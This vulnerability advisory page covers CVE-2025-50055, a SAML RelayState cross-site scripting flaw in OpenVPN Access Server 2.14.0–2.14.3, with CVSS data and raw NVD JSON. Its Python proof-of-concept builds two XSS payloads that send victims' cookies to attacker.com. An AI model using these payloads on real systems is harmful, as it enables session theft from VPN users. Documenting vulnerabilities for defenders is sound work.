Security Vulnerability Report
CVE-2025-50055 CVSS 6.4 MEDIUM

CVE-2025-50055

Published: 2025-10-27 14:15:41
Last Modified: 2026-04-15 00:35:42

Description

Cross-site scripting (XSS) vulnerability in the SAML Authentication module in OpenVPN Access Server versions 2.14.0 through 2.14.3 allows configured remote SAML Assertion Consumer Service (ACS) endpoint servers to inject arbitrary web script or HTML via the RelayState parameter.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

OpenVPN Access Server 2.14.0
OpenVPN Access Server 2.14.1
OpenVPN Access Server 2.14.2
OpenVPN Access Server 2.14.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import urllib.parse

# CVE-2025-50055 PoC - OpenVPN Access Server SAML XSS via RelayState
# This PoC demonstrates how an attacker can inject malicious JavaScript
# through the RelayState parameter in the SAML ACS endpoint

target_url = "https://vpn.example.com/saml/acs"

# Malicious RelayState payload - XSS via img tag onerror handler
xss_payload = '<img src=x onerror="fetch(\'https://attacker.com/log?cookie=\'+document.cookie)">'

# Encode the payload for URL
encoded_payload = urllib.parse.quote(xss_payload)

# Construct the SAML response URL with malicious RelayState
# In real attack, this would be part of a crafted SAML Response
malicious_url = f"{target_url}?RelayState={encoded_payload}"

print(f"Target: {target_url}")
print(f"Malicious URL: {malicious_url}")
print(f"Encoded Payload: {encoded_payload}")

# Alternative payload using script tag
script_payload = '<script>document.location="https://attacker.com/steal?data="+btoa(document.cookie)</script>'
encoded_script = urllib.parse.quote(script_payload)
print(f"\nAlternative script payload: {encoded_script}")

# The actual attack would involve:
# 1. Creating a malicious SAML Response with the XSS payload in RelayState
# 2. Tricking the victim into visiting the crafted URL or submitting the response
# 3. When the server reflects the RelayState without sanitization, XSS executes

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50055", "sourceIdentifier": "[email protected]", "published": "2025-10-27T14:15:40.687", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability in the SAML Authentication module in OpenVPN Access Server version 2.14.0 through 2.14.3 allows configured remote SAML Assertion Consumer Service (ACS) endpoint servers to inject arbitrary web script or HTML via the RelayState parameter"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://openvpn.net/as-docs/as-3-0-release-notes.html#access-server-3-0-0", "source": "[email protected]"}]}}